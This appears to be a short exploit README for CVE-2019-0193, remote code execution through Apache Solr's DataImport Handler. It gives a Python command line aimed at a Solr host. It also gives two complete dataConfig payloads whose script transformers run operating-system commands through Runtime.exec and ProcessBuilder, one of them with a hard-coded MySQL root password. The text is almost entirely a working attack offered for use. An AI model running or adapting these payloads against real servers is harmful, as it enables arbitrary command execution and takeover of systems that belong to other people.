Awesome
CVE-2019-0193 Solr DataImport Handler RCE (RCE-Vuln < solr v8.12)
python usage
python CVE-2019-0193.py http://192.168.2.18:8983 "calc"
URLDataSource_Poc
<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[
function poc(){ java.lang.Runtime.getRuntime().exec("calc");
}
]]></script>
<document>
<entity name="stackoverflow"
url="https://stackoverflow.com/feeds/tag/solr"
processor="XPathEntityProcessor"
forEach="/feed"
transformer="script:poc" />
</document>
</dataConfig>
jdbc
D:\CVE\CVE-2019-0193\solr-7.7.2\server\solr-webapp\webapp\WEB-INF\lib\mysql-connector-java-5.1.48.jar
<dataConfig>
<dataSource name="fromMysql"
type="JdbcDataSource"
driver="com.mysql.jdbc.Driver"
url="jdbc:mysql://localhost:3306/mysql"
user="root"
password="jas502n"/>
<script ><![CDATA[
function poc(row) {
var x=new java.lang.ProcessBuilder;x.command("notepad",'1.txt');org.apache.commons.io.IOUtils.toString(x.start().getInputStream());
return row;
}
]]>
</script>
<document>
<entity name="Jas502n" transformer="script:poc" query="SELECT 1">
</entity>
</document>
</dataConfig>